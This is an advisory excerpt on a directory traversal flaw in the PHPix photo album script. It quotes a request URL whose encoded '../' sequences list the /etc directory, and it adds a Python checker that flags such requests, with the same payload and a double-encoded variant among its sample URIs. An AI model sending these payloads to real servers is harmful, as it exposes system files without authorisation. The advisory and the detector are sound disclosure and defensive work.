PHPix Directory Traversal Vulnerability

From Synnergy advisory SLA-2000-15:

Example:

http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0

The above line, if given, will output all the directories that are nested within the /etc
directory. Other more sinister content can be revealed from there.
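
For defenders, the check below is an added example (not code from the advisory or from PHPix) that flags request URIs whose album parameter resolves outside the album directory, including double-encoded separators. The ALBUM_ROOT path, the function names and the sample URIs are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

ALBUM_ROOT = "/var/www/Album/albums"  # assumed album root, not taken from the advisory

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded separators (%252F) are caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def album_escapes_root(album, root=ALBUM_ROOT):
    """True if the album value resolves outside root once joined and normalised."""
    album = decode_fully(album).replace("\\", "/")
    if "\x00" in album:  # a NUL byte never belongs in an album name
        return True
    # An absolute value such as "/etc" replaces root entirely in join().
    resolved = posixpath.normpath(posixpath.join(root, album))
    return not (resolved == root or resolved.startswith(root + "/"))

def suspicious_album_requests(request_uris):
    """Return the request URIs whose album parameter leaves the album root."""
    hits = []
    for uri in request_uris:
        params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
        # parse_qs has already percent-decoded each value once.
        if any(album_escapes_root(a) for a in params.get("album", [])):
            hits.append(uri)
    return hits

# Constructed sample request URIs; the second matches the advisory's example.
SAMPLE_URIS = [
    "/Album/?mode=album&album=holiday%2F2000&dispsize=640&start=0",
    "/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0",
    "/Album/?mode=album&album=..%252F..%252Fetc&dispsize=640&start=0",
    "/Album/?mode=album&album=holiday%2F..%2Fbirthday&dispsize=640&start=0",
]

if __name__ == "__main__":
    for uri in suspicious_album_requests(SAMPLE_URIS):
        print("traversal:", uri)
```

The same resolve-then-compare test, applied server-side before the album directory is opened, is the containment check that keeps the parameter inside the album tree.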


Copyright 2010, SecurityFocus